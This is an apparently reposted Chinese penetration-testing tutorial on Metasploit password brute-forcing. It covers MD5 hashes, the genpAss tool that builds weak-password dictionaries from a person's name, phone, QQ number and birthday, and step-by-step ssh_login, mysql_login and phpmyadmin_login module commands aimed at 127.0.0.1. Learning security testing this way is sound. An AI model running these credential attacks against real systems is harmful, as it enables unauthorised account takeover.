滲透利器-kali工具 (第五章-3) Metasploit密碼爆破模塊


本文內容:

  • 常見的加密方式
  • 密碼生成工具
  • 查找爆破模塊
  • 實戰密碼爆破

 

使用MSF的爆破模塊進行進一步"信息收集"。

1,常見的加密方式:

  1.MD5加密:
    常用的密碼驗證算法,用於操作系統登錄認證。

    例如:49ba59abbe56e057 [123456]

    明文密碼:

      存在規律性

      可破解性

      對應性[撞庫]

    密文:

      使用加密算法

      唯一性

      不可偽造性

      不可逆性

    常見的hash加密:

      https://www.jianshu.com/p/0d53b9b5631e

      https://cmd5.com/

    在線工具箱:

      https://tool.bugku.com/

  2.驗證hash值:

    Windows自帶工具驗證hash值:

      certutil /?             查看幫助

      certutil -hashfile 1.jpg MD5   查看文件MD5值

    作用:

      1.驗證文件是否損壞

      2.驗證文件是否被修改[后門]

    案例:

      https://www.freebuf.com/articles/paper/147403.html (新聞)

      https://www.qianxin.com/other/CVE-2019-0708

2,密碼生成工具-genpAss:

  中國特色的弱口令生成器:

  指令:

    -n    命令

    -u    用戶名

    -q    QQ號

    -e    郵箱

    -m     手機號

    -b    生日:格式:2001-01-01 

    -c    公司名

    -o    導出文件

  下載地址:https://github.com/RicterZ/genpAss

  安全趣聞:https://www.freebuf.com/sectool/197414.html

  案例:http://www.anquan.us/static/bugs/wooyun-2016-0197071.html

  密碼泄露查詢:https://haveibeenpwned.com/Passwords 

3,查找 爆破模塊:

  查找爆破模塊的姿勢:

    查找關鍵字:login  [search type:auxiliary login]

  通過搜索功能快速找到我們想要的模塊,縮小范圍、精確定位。

    查找服務名:search type:auxiliary name:ssh

    查找服務名+關鍵字:search type:auxiliary name:phpmyadmin login

4,實戰密碼爆破:

  通過"信息收集"進行針對性的密碼爆破

  1.SSH密碼爆破:

    使用模塊名:auxiliary/scanner/ssh/ssh_login

    1.查找模塊: search type:auxiliary name:ssh

    2.使用模塊: use auxiliary/scanner/ssh/ssh_login

    3.查看需設置選項:options   [pass_file,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]

    4.設置目標地址:set rhosts 地址[127.0.0.1] 

    5.設置用戶名:set username root

    6.設置字典:set pass_file /root/桌面/1.txt  [文件路徑+文件名稱]

    7.開始爆破:run

  2.MySQL密碼爆破:[顯示詳細結果]

    使用模塊名:auxiliary/scanner/mysql/mysql_login

    1.查找模塊:search type:auxiliary name:mysql

    2.使用模塊:use auxiliary/scanner/mysql/mysql_login

    3.查看設置選項:options  [pass_file,rport,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]

    4.設置目標地址:set rhosts 地址 [127.0.0.1]

    5.設置用戶名:set username root

    6.設置密碼字典:set pass_file /root/桌面/1.txt  [文件路徑+文件名稱]

    7.開始爆破:run

  3.phpadmin登錄驗證爆破:[顯示詳細結果]

    使用模塊名:auxiliary/scanner/http/phpmyadmin_login

    1.查找模塊:search type:auxiliary name:phpmyadmin

    2.使用模塊:use auxiliary/scanner/http/phpmyadmin_login

    3.查看設置選項:options  [pass_file,rport,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]

    4.設置目標地址:set rhosts 地址[127.0.0.1]

    5.設置端口號:set rport 端口[8080]

    6.設置目標范圍:set targeturl phpAdmin/index.php

    7.設置用戶名:set username root

    8.設置密碼字典:set pass_file /root/桌面/1.txt

    9.開始爆破:run

         

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM